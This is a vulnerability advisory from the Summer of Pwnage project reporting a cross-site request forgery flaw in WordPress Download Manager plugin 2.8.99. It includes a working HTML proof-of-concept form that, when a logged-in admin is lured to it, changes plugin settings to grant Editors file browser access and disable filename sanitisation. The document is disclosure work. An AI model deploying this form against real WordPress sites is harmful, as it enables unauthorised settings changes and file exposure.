WordPress Download Manager 2.8.99 Cross Site Request Forgery

WordPress Download Manager plugin version 2.8.99 suffers from a cross site request forgery vulnerability.


MD5 | 2cc3001139037abf9cba48bd74cae8e8

------------------------------------------------------------------------
Cross-Site Request Forgery in WordPress Download Manager Plugin
------------------------------------------------------------------------
Burak Kelebek, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Request Forgery vulnerability has been found in the
WordPress Download Manager Plugin. By using this vulnerability an
attacker can change confidential settings of the plugin.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160722-0005

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on WordPress Download Manager version
2.8.99.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
There is currently no fix available.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_wordpress_download_manager_plugin.html

The Download Manager plugin lacks a CSRF (nonce) token on the request of saving settings. Because of this an attacker is able to change confidential settings like file browser access and browser base dir by luring a logged-in admin to follow a malicious link containing the proof of concept below.
Proof of concept

The proof of concept below gives file browser access to a user with Editor privileges:

<html>
<body>
<form action="http://<target>/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="task" value="wdm_save_settings"/>
<input type="hidden" name="action" value="wdm_settings"/>
<input type="hidden" name="section" value="basic"/>
<input type="hidden" name="wpdm_permission_msg" value="Access Denied"/>
<input type="hidden" name="wpdm_login_msg" value="<a href='http://<target>/wp-login.php'>Please login to download</a>
"/>
<input type="hidden" name="_wpdm_file_browser_root" value="/srv/www/wordpress-default/"/>
<input type="hidden" name="_wpdm_file_browser_access[]" value="editor"/>
<input type="hidden" name="_wpdm_file_browser_access[]" value="administrator"/>
<input type="hidden" name="__wpdm_sanitize_filename" value="0"/>
<input type="hidden" name="__wpdm_download_speed" value="4096"/>
<input type="hidden" name="__wpdm_download_resume" value="1"/>
<input type="hidden" name="__wpdm_support_output_buffer" value="1"/>
<input type="hidden" name="__wpdm_open_in_browser" value="0"/>
<input type="hidden" name="_wpdm_recaptcha_site_key" value=""/>
<input type="hidden" name="_wpdm_recaptcha_secret_key" value=""/>
<input type="hidden" name="__wpdm_disable_scripts[]" value=""/>
<input type="hidden" name="__wpdm_login_url" value=""/>
<input type="hidden" name="__wpdm_register_url" value=""/>
<input type="hidden" name="__wpdm_user_dashboard" value=""/>
<input type="submit"/>
</form>
</body>
</html>


------------------------------------------------------------------------
Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its
goal is to contribute to the security of popular, widely used OSS
projects in a fun and educational way.

Related Posts

Comments